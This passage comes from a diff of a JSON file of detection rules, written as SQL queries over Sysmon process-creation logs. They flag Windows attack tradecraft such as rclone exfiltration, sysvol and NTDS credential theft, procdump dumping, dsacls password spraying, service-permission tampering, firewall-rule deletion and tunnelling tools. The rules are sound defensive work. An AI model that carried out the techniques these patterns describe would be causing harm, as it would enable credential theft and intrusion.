ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Suspicious Registration via cscript.exe", - "id": 
"28c8f68b-098d-45af-8d43-8089f3e35403", + "title": "Gpg4Win Decrypt Files From Suspicious Locations", + "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "status": "experimental", - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "author": "Austin Songer @austinsonger", + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" + "filename": "proc_creation_win_gpg4win_susp_usage.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", - "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that 
can be used to execute any other binary", + "title": "Procdump Execution", + "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "status": "experimental", + "description": "Detects usage of the SysInternals Procdump utility", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" - }, - { - "title": "Domain Trust Discovery Via Dsquery", - "id": "3bad990e-4848-4a78-9530-b427d854aac0", - "status": "test", - "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", - "author": "E.M. 
Anhaus, Tony Lambert, oscd.community, omkar72", - "tags": [ - "attack.discovery", - "attack.t1482" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" + "Legitimate use of procdump by a developer or administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" + "filename": "proc_creation_win_sysinternals_procdump.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND 
(CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "PsExec Service Execution", - "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "title": "Potential Recon Activity Using Wevtutil", + "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", "status": "experimental", - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", + "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery" ], "falsepositives": [ - "Legitimate administrative tasks" + "Legitimate usage of the utility by administrators to query the event log" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE 
'%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc.yml" + "filename": "proc_creation_win_wevtutil_recon.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "status": "experimental", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", 
"status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.lateral_movement" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": 
"proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Remote Access Tool - LogMeIn Execution", - "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an 
interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Potential Password Spraying Attempt Using Dsacls.EXE", + "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "status": "experimental", + "description": "Detects possible password spraying attempts using Dsacls", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of dsacls to bind to an LDAP session" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_logmein.yml" + "filename": "proc_creation_win_dsacls_password_spray.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WmiPrvSE Spawned A Process", + "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "status": "stable", + "description": "Detects WmiPrvSE spawning a process", + "author": 
"Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "False positives are expected (e.g. in environments where WinRM is used legitimately)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((LogonId IN ('0x3e7', 'null')) OR ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (LogonId = '')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_wmiprvse_spawning_process.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "PUA - Advanced Port Scanner Execution", + "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "status": "experimental", + "description": "Detects the use of Advanced Port Scanner.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.discovery", + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use", + "Tools with similar commandline (very rare)" ], - "level": "critical", + "level": "medium", "rule": 
[ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_pua_advanced_port_scanner.yml" }, { - "title": "Rundll32 InstallScreenSaver Execution", - "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "status": "experimental", - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "title": "Esentutl Gather Credentials", + "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "status": "test", + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. 
Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "author": "sam0x90", "tags": [ - "attack.t1218.011", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate installation of a new screensaver" + "To be determined" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" + "filename": "proc_creation_win_esentutl_params.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", - "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND 
(CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winzip_password_compression.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Always Install Elevated MSI Spawned Cmd And Powershell", + "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", - "author": "Florian Roth (Nextron 
Systems)", + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentImage LIKE '%msi%' ESCAPE '\\' AND ParentImage LIKE '%tmp' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "title": "Firewall Rule Deleted Via Netsh.EXE", + "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Legitimate administration activity", + "Software installations and removal" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_netsh_fw_delete_rule.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, 
